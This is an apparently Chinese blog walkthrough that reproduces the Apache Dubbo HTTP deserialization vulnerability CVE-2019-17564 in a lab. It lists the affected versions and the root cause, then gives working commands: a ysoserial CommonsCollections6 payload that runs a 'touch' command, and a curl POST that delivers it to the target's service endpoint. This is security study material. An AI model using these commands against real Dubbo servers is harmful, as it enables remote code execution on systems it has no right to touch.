CVE-2019-17564Apache Dubbo反序列化漏洞
漏洞环境

访问环境状态码500

影响版本
Apache Dubbo >=2.7.0,<= 2.7.4、Apache Dubbo 2.5.*、Apache Dubbo >=2.6.0,<= 2.6.7
漏洞描述
Dubbo可以使用不同协议通信,当使用http协议时,Apache Dubbo直接使用了Spring框架的org.springframework.remoting.httpinvoker.HttpInvokerServiceExporter类做远程调用,而这个过程会读取POST请求的Body并进行反序列化,最终导致漏洞
漏洞复现
首先通过zookeeper自带的zkCli建立一个交互式的shell来确定RPC接口的名称zookeeper下载地址
https://archive.apache.org/dist/zookeeper/zookeeper-3.3.3/zookeeper-3.3.3.tar.gz
解压后用执行bin目录下的zkCli.sh
./zkCli.sh -server your-ip:2181

通过ysoserial中的CommonsCollections6反序列化工具生成payload,ysoserial下载地址
在kali的桌面打开终端
依次执行这条命令
java -jar ysoserial-master-d367e379d9-1.jar CommonsCollections6 "touch /tmp/ssssbbbb" > sb.out

curl -XPOST --data-binary @sb.out http://192.168.xxx/xxx:8080/org.vulhub.api.CalcService

去靶机进行查看

有个小坑
踩坑在靶机执行这条命令
docker exec -it (docker ps -a 相应服务的 前三位) /bin/bash
列子

请及时留言.我及时改正。以防浪费更多的人时间

浙公网安备 33010602011771号